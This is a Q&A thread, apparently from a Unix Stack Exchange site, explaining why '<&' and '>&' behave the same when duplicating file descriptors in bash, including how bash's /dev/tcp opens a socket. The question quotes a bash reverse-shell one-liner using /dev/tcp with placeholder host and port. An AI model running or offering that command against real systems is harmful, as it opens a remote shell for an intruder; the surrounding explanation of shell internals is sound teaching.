# Understanding I/O redirection in Bash

Tags: bash, io-redirection

I was searching a way to get a reverse shell in bash, when I found this:

```
bash -i > /dev/tcp/HOST/PORT 0<&1 2>&1
```

As I understand,  stdout and stderr are sent through the connection(`/dev/tcp/HOST/PORT`), and stdin reads through the connection(`0<&1`). But, as I read [here](https://unix.stackexchange.com/a/116016), the expression 0>&1 works too. This doesn't make sense for me (as I learned, `>` is for 'write to the following fd', and `<`  for  'read from the following fd' ) and only should work the first way.

My question is:  Did I forget something or I'm absolutely wrong? What are the internal processes involved in this sample of I/O redirection?

Answer (score 4, accepted):

The only difference between the `<&` and `>&` syntaxes is that the former checks if the target file descriptor is open for input, and the latter checks if it's open for output. The actual operation is the same in both cases (probably a `dup2` call). Meanwhile, `> /dev/tcp/HOST/PORT` isn't doing an `open` syscall, like most redirections; the `/dev/tcp` syntax is a bash special case, and in fact bash is opening a socket (which then behaves like a normal file descriptor w.r.t. the `read` and `write` calls). Sockets don't have the property that open files have of being opened for only read or only write; a socket allows both reading and writing (though you can `shutdown(2)` either half of that, if you want). Thus, bash doesn't redirection-error either of the two syntaxes used, and since the `dup2` call is the same, the behavior is identical.

Comment: pretty much any file will allow read and write - else what good would they be? you can open an fd with `<>` that way as well.

Comment: Yes, but the default mode for file redirections is either read-only or write-only. (And mixing read and write operations to an open file is a somewhat rare special case, whereas mixing read and write operations to a socket is the first thing everyone does.)

Answer (score 3):

Yes. `<` `>` mean the things you say when they apply to an `open()`. But you don't do that when you're working with pre-existing file descriptors - they're already `open()`'d. So it doesn't matter which of those tokens you use because the shell is not going to change the read/write characteristics of a file-descriptor it's already got - it's only going to `dup()` it.

So...

```sh
{ read v <&4; } 4>/dev/null
```

---

```
read: read error: 0: Bad file descriptor
```

But...

```sh
{ read v 0>&4; } 4</dev/null
```

...doesn't complain at all.

In both of the above examples the file descriptors are successfully duplicated. The shell doesn't complain about the fd duping because that works just fine. Here's basically the same thing as the one that complained before:

```sh
{ echo hi there; read v; } 0>/dev/null
```

---

```
hi there
read: read error: 0: Bad file descriptor
```

It's `read` complaining there because when it tries to read from file descriptor zero it gets EBADF. The shell is just as successful at duping `&4` to stdin in the first example as it is successful at doing the write-only `open()` on stdin in the second.

Actually, in an fd dup context the `<` and `>` tokens are not completely insignificant, though, because `<&[num]` and `>&[num]` are still shorthand for `0<&[num]` and `1>&[num]` of course.

Comment: I don't get it: does read use fd 0 as standard or is 4 a pre-existing fd? Is `read v <&4;` the same as `read v 0<&4;`?

Comment: @LePloit - ...uhh. both. I put the `read` command in a *`{`compound command`}`* context, and so all redirections which occur to the right of its closing brace are applied to the entire group, and they are applied before any enclosed commands are run. So `&4` pre-exists the `read` simple command.